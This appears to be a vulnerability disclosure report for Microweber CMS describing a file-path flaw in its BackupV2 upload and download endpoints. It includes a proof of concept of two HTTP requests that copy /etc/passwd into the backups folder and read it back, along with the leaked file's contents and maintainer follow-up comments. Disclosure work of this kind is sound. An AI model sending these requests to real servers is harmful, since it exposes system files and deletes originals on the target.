External Control of File Name or Path in microweber/microweber
Jan 29th 2022
In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability.
When logged in as administrator, we can upload any readable file from the operating system into the backups folder. The backup files are located in /var/www/microweber/storage/backup_content/.
Proof of Concept
- Upload /etc/passwd file into the backups folder.
GET /api/BackupV2/upload?src=/etc/passwd Host: 192.168.188.132 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2 Cookie: -- snippet --
- Read the file from the backups folder.
GET /api/BackupV2/download?file=passwd Host: 192.168.188.132 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2 Cookie: -- snippet --
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin -- snippet --
This vulnerability is capable of local file inclusion and can be used to gain access to the server when combined with vulnerability chaining. Additionally original files are deleted after uploading, as a result of that files can be lost. So deleting any file in the webroot can cause web application to not respond to HTTP requests.
@maintainer @admin any update?
Our automated notification system will continue to reach out to the maintainers. Please get in touch with us once the report has gone stale, and we will manually reach out to the maintainers on your behalf ♥️
Hello this issue has been fixed , thanks for the report
@maintainer Hello Peter, the commit does not seem to be the solution.